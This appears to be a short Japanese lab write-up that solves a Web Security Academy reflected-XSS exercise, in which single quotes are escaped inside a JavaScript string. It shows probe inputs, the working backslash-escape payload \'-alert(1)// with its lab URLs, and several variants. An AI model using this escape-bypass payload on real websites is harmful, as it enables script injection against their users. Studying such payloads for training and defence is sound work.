Hello there, ('ω')ノ
区切り符号と二重引用符を使用してHTMLでエンコードして。
一重引用符をエスケープしたJavaScriptで反射型XSSを。
まずは、動作確認から。
下記を入力した際のレスポンスは以下のとおりで。
test
下記を入力した際のレスポンスは以下のとおりで。
te'st
下記を入力した際のレスポンスは以下のとおりで。
te\'st
下記を入力した際のレスポンスは以下のとおりで。
te\\'st
下記のペイロードを入力するとスクリプトが実行されて。
\'-alert(1)//
URLは以下のとおりで。
https://ac111f3f1f5aa348807c1af500bf00a4.web-security-academy.net/?search=%5C%27-alert%281%29%2F%2F
URLデコードした結果は以下のとおりで。
https://ac111f3f1f5aa348807c1af500bf00a4.web-security-academy.net/?search=\'-alert(1)//
クリアできた。
ちなみに下記を入力した結果は1件ヒットして。
game
下記の場合だと0件で。
'game
下記の場合も同様で。
\'game
さらには、下記の場合でもスクリプトは実行できて。
\'-alert(1)-alert(2)//
URLは以下のようになって。
URLデコードした結果は以下のとおりで。
https://acf61f3e1f01fb6480723d8600770073.web-security-academy.net/?search=\'-alert(1)-alert(2)//
他にも下記も同じように実行できて。
\'-alert(1);alert(2)//
Best regards, (^^ゞ